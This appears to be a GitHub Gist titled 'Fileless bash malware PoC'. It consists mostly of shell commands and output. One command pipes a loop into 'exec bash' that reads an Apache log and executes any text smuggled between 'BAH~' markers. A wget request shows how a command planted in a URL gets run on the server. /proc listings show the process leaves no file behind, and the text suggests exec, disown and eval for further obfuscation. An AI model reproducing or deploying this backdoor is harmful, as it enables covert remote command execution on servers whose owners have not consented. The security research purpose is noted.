Last active
September 19, 2022 18:26
-
-
Save timb-machine/7bd75479ee29aee8762952ea16908eb0 to your computer and use it in GitHub Desktop.
Fileless bash malware PoC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ echo "while :; do grep "BAH~" /var/log/apache2/interesting.log | cut -f 2 -d \"~\" | tr '_' ' '; done" | exec bash | |
| $ wget --no-check-certificate 'https://interesting/?BAH~touch_/tmp/foo~' | |
| root 10680 10679 0 21:27 pts/1 00:00:00 /bin/bash | |
| root 11125 10680 17 21:27 pts/1 00:00:02 bash | |
| $ ls /proc/11125/fd | |
| total 0 | |
| dr-x------ 2 root root 0 Jun 28 21:27 . | |
| dr-xr-xr-x 9 root root 0 Jun 28 21:27 .. | |
| lr-x------ 1 root root 64 Jun 28 21:28 0 -> pipe:[290558013] | |
| lrwx------ 1 root root 64 Jun 28 21:28 1 -> /dev/pts/1 | |
| lrwx------ 1 root root 64 Jun 28 21:27 2 -> /dev/pts/1 | |
| $ cat /proc/11125/cmdline | |
| bash | |
| cat /proc/11125/cwd | |
| /root | |
| Things like exec/disown/patterns/eval add some fun options for further obfuscation... |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This PoC is nobbled. Just in case anyone is confused. The point is rather the "| exec bash" rather than the payload specifics.